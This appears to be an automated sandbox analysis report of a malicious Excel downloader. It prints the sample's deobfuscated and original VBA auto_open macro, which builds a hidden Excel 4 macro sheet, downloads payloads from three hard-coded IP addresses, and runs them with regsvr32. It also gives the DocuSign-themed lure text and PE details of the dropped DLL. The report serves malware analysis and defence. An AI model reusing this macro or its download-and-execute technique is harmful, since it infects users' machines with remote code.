Malicious
Classifications
Downloader Injector
Threat Names
Mal/HTMLGen-A Gen:Variant.Bulz.604474
Dynamic Analysis Report
Created on 2021-09-27T19:15:00
3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36.xlsx.xls
Excel Document
Remarks (1/1)
(0x0200000E): The overall sleep time of all monitored processes was truncated from "3 days, 5 hours, 54 minutes, 21 seconds" to "8 hours, 47 minutes, 56 seconds" to reveal dormant functionality.
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
File Name | Category | Type | Verdict | Actions |
---|
C:\Users\RDhJ0CNFevzX\Desktop\3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36.xlsx.xls | Sample File | Excel Document |
malicious
|
...
|
»
Office Information
»
Creator | Test |
Last Modified By | Test |
Create Time | 2015-06-05 18:17:20+00:00 |
Modify Time | 2021-09-27 09:38:52+00:00 |
Codepage | ANSI_Cyrillic |
Application | Microsoft Excel |
App Version | 16.0 |
Document Security | NONE |
Titles Of Parts | Sheet1 |
scale_crop | False |
shared_doc | False |
Controls (1)
»
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020820-0000-0000-C000-000000000046} | Excel97Sheet | - |
VBA Macros (2)
»
Macro #1: Module5
»
Deobfuscated Code
Attribute VB_Name = "Module5"
Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
Gert
Sheets("Sheet777").Visible = False
Sheets("Sheet777").Range("A1:M100").Font.Color = 16777215
Sheets("Sheet777").Range("H24") = "http://190.14.37.178/"
Sheets("Sheet777").Range("H25") = "http://185.183.96.67/"
Sheets("Sheet777").Range("H26") = "http://185.250.148.213/"
Sheets("Sheet777").Range("K17") = "=NOW()"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("H35") = "=HALT()"
Sheets("Sheet777").Range("I9") = "uRlMon"
Sheets("Sheet777").Range("I10") = "UserForm2"
Sheets("Sheet777").Range("I11") = "JJCCBB"
Sheets("Sheet777").Range("I12") = "Byukilos"
Sheets("Sheet777").Range("G10") = "..\Drezd.red"
Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet777").Range("H9") = "=REGISTER(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet777").Range("H17") = "=EXEC(I17)"
Sheets("Sheet777").Range("H18") = "=EXEC(I18)"
Sheets("Sheet777").Range("H19") = "=EXEC(I19)"
Application.Run Sheets("Sheet777").Range("H1")
End Sub
Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
Application.DisplayAlerts = False
Sheets("Sheet777").Delete
Application.DisplayAlerts = True
End Sub
Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet777"
End Function
Original Code
Attribute VB_Name = "Module5"
Sub auto_open()
On Error Resume Next
Trewasd = "REGISTER"
Drezden = "="
Naret = "EXEC"
Application.ScreenUpdating = False
Gert
Sheets("Sheet777").Visible = False
Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite
Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption
Sheets("Sheet777").Range("K17") = "=NOW()"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("H35") = "=HALT()"
Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
Sheets("Sheet777").Range("I10") = UserForm2.Caption
Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet777").Range("I12") = "Byukilos"
Sheets("Sheet777").Range("G10") = "..\Drezd.red"
Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"
Application.Run Sheets("Sheet777").Range("H1")
End Sub
Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
Application.DisplayAlerts = False
Sheets("Sheet777").Delete
Application.DisplayAlerts = True
End Sub
Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet777"
End Function
Macro #2: ThisWorkbook
»
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean
Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
End Sub
Private Sub asWorkbook_Activateas()
On Error Resume Next
If m_isOpenDelayed Then
m_isOpenDelayed = False
InitWorkbook
End If
End Sub
Private Sub saWorkbook_Opensa()
On Error Resume Next
End Sub
Private Sub ssaaInitWorkbookssaa()
On Error Resume Next
If VBA.Val(Application.Version) < 12 Then
Me.Close False
Exit Sub
End If
'
'Other code
'
'
'
End Sub
Extracted Image Texts (1)
»
Image 1: 0.JPG
»
DocuSign
THIS DOCUMENT ENCRYPTED BY
DOCUSIGN® PROTECT SERVICE
This steps are required to fully decrypt the document,
encrypted by DocuSign
1, If this docs
above
example of notification
Q rrorecreowannne This fle oiginsted from an internet location and might be unsafe Chick for more details Enable Editing
2. Click to “Enable Content” to perform Microsoft Excel Decryption Core to start the decryption of the
document
example of notification
@ sxcuntrr warm Macros hove been disabled Enable Macros
Why I can not open this document?
nt was downloaded from | mail, then please click “Enable editing" in the yellow bar
- You are using iOS or Android device. Please use Desktop PC.
- You are trying to view this document using Online Viewer.
ViNorton BE Microsoft [J Office
© DocuSign Inc. 2021
CFB Streams (21)
»
Name | ID | Size | Actions |
---|---|---|---|
Root\Workbook | 1 | 99.44 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\dir | 4 | 1.02 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\Sheet1 | 5 | 991 Bytes |
...
|
Root\_VBA_PROJECT_CUR\VBA\Module5 | 6 | 4.14 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_0 | 7 | 2.40 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_1 | 8 | 138 Bytes |
...
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_2 | 9 | 264 Bytes |
...
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_3 | 10 | 256 Bytes |
...
|
Root\_VBA_PROJECT_CUR\VBA\UserForm2 | 11 | 1.15 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\ThisWorkbook | 12 | 2.44 KB |
...
|
Root\_VBA_PROJECT_CUR\VBA\_VBA_PROJECT | 13 | 4.23 KB |
...
|
Root\_VBA_PROJECT_CUR\PROJECT | 14 | 662 Bytes |
...
|
Root\_VBA_PROJECT_CUR\PROJECTlk | 15 | 30 Bytes |
...
|
Root\_VBA_PROJECT_CUR\PROJECTwm | 16 | 116 Bytes |
...
|
Root\_VBA_PROJECT_CUR\UserForm2\f | 18 | 226 Bytes |
...
|
Root\_VBA_PROJECT_CUR\UserForm2\o | 19 | 272 Bytes |
...
|
Root\_VBA_PROJECT_CUR\UserForm2\CompObj | 20 | 97 Bytes |
...
|
Root\_VBA_PROJECT_CUR\UserForm2\VBFrame | 21 | 302 Bytes |
...
|
Root\SummaryInformation | 22 | 208 Bytes |
...
|
Root\DocumentSummaryInformation | 23 | 244 Bytes |
...
|
Root\CompObj | 24 | 108 Bytes |
...
|
Extracted URLs (3)
»
URL | WHOIS Data | Reputation Status | Recursively Submitted | Actions |
---|---|---|---|---|
http://185.183.96.67 |
Not Queried
|
N/A
|
- |
...
|
http://185.250.148.213 |
Not Queried
|
N/A
|
- |
...
|
http://190.14.37.178 |
Not Queried
|
N/A
|
- |
...
|
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat | Modified File | Stream |
clean
|
...
|
»
c:\lsarpc | Dropped File | Unknown |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\temp\~df29dbd0834f02d2ce.tmp | Dropped File | Stream |
clean
Known to be clean.
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\temp\~dfad4a9cdf69cebb65.tmp | Dropped File | Stream |
clean
Known to be clean.
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
PE Information
»
Image Base | 0x10000000 |
Entry Point | 0x10001000 |
Size Of Code | 0x30a00 |
Size Of Initialized Data | 0x1f600 |
File Type | FileType.dll |
Subsystem | Subsystem.windows_gui |
Machine Type | MachineType.i386 |
Compile Timestamp | 2021-09-10 16:49:09+00:00 |
Sections (9)
»
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x10001000 | 0x3090c | 0x30a00 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 3.39 |
.edata | 0x10032000 | 0x70 | 0x200 | 0x30e00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 0.0 |
.data | 0x10033000 | 0x2000 | 0x1400 | 0x31000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
.data | 0x10035000 | 0xbf54 | 0xc000 | 0x32400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
.rdatat | 0x10041000 | 0x648 | 0x800 | 0x3e400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
.rsrc | 0x10042000 | 0x10bf4 | 0x10c00 | 0x3ec00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 0.0 |
- | 0x10053000 | 0x5000 | 0x5000 | 0x4f800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
- | 0x10058000 | 0x5000 | 0x5000 | 0x54800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
- | 0x1005d000 | 0x5000 | 0x5000 | 0x59800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text |
clean
|
...
|
»
PE Information
»
Image Base | 0x10000000 |
Entry Point | 0x10001000 |
Size Of Code | 0x30a00 |
Size Of Initialized Data | 0x1f600 |
File Type | FileType.dll |
Subsystem | Subsystem.windows_gui |
Machine Type | MachineType.i386 |
Compile Timestamp | 2021-09-10 16:49:09+00:00 |
Sections (9)
»
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x10001000 | 0x3090c | 0x30a00 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.09 |
.edata | 0x10032000 | 0x70 | 0x200 | 0x30e00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 1.32 |
.data | 0x10033000 | 0x2000 | 0x1400 | 0x31000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
.data | 0x10035000 | 0xbf54 | 0xc000 | 0x32400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.08 |
.rdatat | 0x10041000 | 0x648 | 0x800 | 0x3e400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.75 |
.rsrc | 0x10042000 | 0x10bf4 | 0x10c00 | 0x3ec00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.09 |
- | 0x10053000 | 0x5000 | 0x5000 | 0x4f800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
- | 0x10058000 | 0x5000 | 0x5000 | 0x54800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
- | 0x1005d000 | 0x5000 | 0x5000 | 0x59800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
Imports (17)
»
kernel32.dll (6)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetProcAddress | - | 0x10041030 | 0x41274 | 0x3e674 | 0x0 |
LoadLibraryA | - | 0x10041034 | 0x41278 | 0x3e678 | 0x0 |
VirtualAlloc | - | 0x10041038 | 0x4127c | 0x3e67c | 0x0 |
VirtualProtect | - | 0x1004103c | 0x41280 | 0x3e680 | 0x0 |
GetCurrentThread | - | 0x10041040 | 0x41284 | 0x3e684 | 0x0 |
lstrcmpA | - | 0x10041044 | 0x41288 | 0x3e688 | 0x0 |
user32.dll (3)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SetWindowPos | - | 0x100410a0 | 0x412e4 | 0x3e6e4 | 0x0 |
ShowCursor | - | 0x100410a4 | 0x412e8 | 0x3e6e8 | 0x0 |
ShowWindow | - | 0x100410a8 | 0x412ec | 0x3e6ec | 0x0 |
ole32.dll (8)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CoCreateGuid | - | 0x10041054 | 0x41298 | 0x3e698 | 0x0 |
OleUninitialize | - | 0x10041058 | 0x4129c | 0x3e69c | 0x0 |
CoFreeUnusedLibraries | - | 0x1004105c | 0x412a0 | 0x3e6a0 | 0x0 |
CoGetCurrentProcess | - | 0x10041060 | 0x412a4 | 0x3e6a4 | 0x0 |
CoGetCurrentLogicalThreadId | - | 0x10041064 | 0x412a8 | 0x3e6a8 | 0x0 |
CoFileTimeNow | - | 0x10041068 | 0x412ac | 0x3e6ac | 0x0 |
CoGetContextToken | - | 0x1004106c | 0x412b0 | 0x3e6b0 | 0x0 |
OleInitialize | - | 0x10041070 | 0x412b4 | 0x3e6b4 | 0x0 |
gdi32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GdiGetBitmapBitsSize | - | 0x10041018 | 0x4125c | 0x3e65c | 0x0 |
advapi32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SystemFunction003 | - | 0x10041000 | 0x41244 | 0x3e644 | 0x0 |
imagehlp.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
FindFileInPath | - | 0x10041028 | 0x4126c | 0x3e66c | 0x0 |
msimg32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
AlphaBlend | - | 0x1004104c | 0x41290 | 0x3e690 | 0x0 |
version.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetFileVersionInfoSizeA | - | 0x100410b0 | 0x412f4 | 0x3e6f4 | 0x0 |
winmm.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
auxGetVolume | - | 0x100410b8 | 0x412fc | 0x3e6fc | 0x0 |
winspool.drv (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
AddPortW | - | 0x100410c0 | 0x41304 | 0x3e704 | 0x0 |
comctl32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetEffectiveClientRect | - | 0x10041008 | 0x4124c | 0x3e64c | 0x0 |
oledlg.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
OleUIPromptUserW | - | 0x10041088 | 0x412cc | 0x3e6cc | 0x0 |
comdlg32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetFileTitleA | - | 0x10041010 | 0x41254 | 0x3e654 | 0x0 |
gdiplus.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GdipImageSelectActiveFrame | - | 0x10041020 | 0x41264 | 0x3e664 | 0x0 |
shell32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SHFileOperationA | - | 0x10041090 | 0x412d4 | 0x3e6d4 | 0x0 |
shlwapi.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SHRegSetUSValueA | - | 0x10041098 | 0x412dc | 0x3e6dc | 0x0 |
oleaut32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SysAllocString | - | 0x10041080 | 0x412c4 | 0x3e6c4 | 0x0 |
Exports (2)
»
Api name | EAT Address | Ordinal |
---|---|---|
GetClass | 0x555f6 | 0x1 |
SetClass | 0x3804d | 0x2 |